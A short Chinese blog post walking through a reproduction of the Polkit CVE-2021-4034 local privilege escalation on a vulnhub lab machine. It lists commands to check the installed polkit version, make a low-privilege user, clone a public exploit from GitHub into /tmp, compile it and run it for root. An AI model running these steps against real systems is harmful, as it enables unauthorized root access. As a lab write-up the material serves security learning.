Polkit(CVE-2021-4034复现)提权

漏洞影响2009年5月至今的所有polkit版本

此工具是linux系统预装工具，所有存在此工具的linux系统都会收到影响

判断是否有这个漏洞：

dpkg -l policykit-1       #debain，ubuntu
rpm -qai  policykit-1     #centos，redhat

本次环境是vulnhub的lampiao(脏牛)靶机

复现：

新建用户：

useradd -d /home/test -m  test     #新建用户
passwd test                        #改密码
su test                            #切换用户
cd /tmp                            #进入tmp目录

下载exp（exp下载到了tmp目录下）：

git clone https://github.com/berdav/CVE-2021-4034.git  #不能下载时，就自己复制链接下载，在传到目标靶机
cd CVE-2021-4034/                                     
make                  #编译                         
./cve-2021-4034       #运行

成功提权：

posted @ 2024-08-08 07:36 mushangqiujin 阅读(66) 评论(0) 收藏举报来源

刷新页面返回顶部

mushangqiujin

Polkit(CVE-2021-4034复现)提权

公告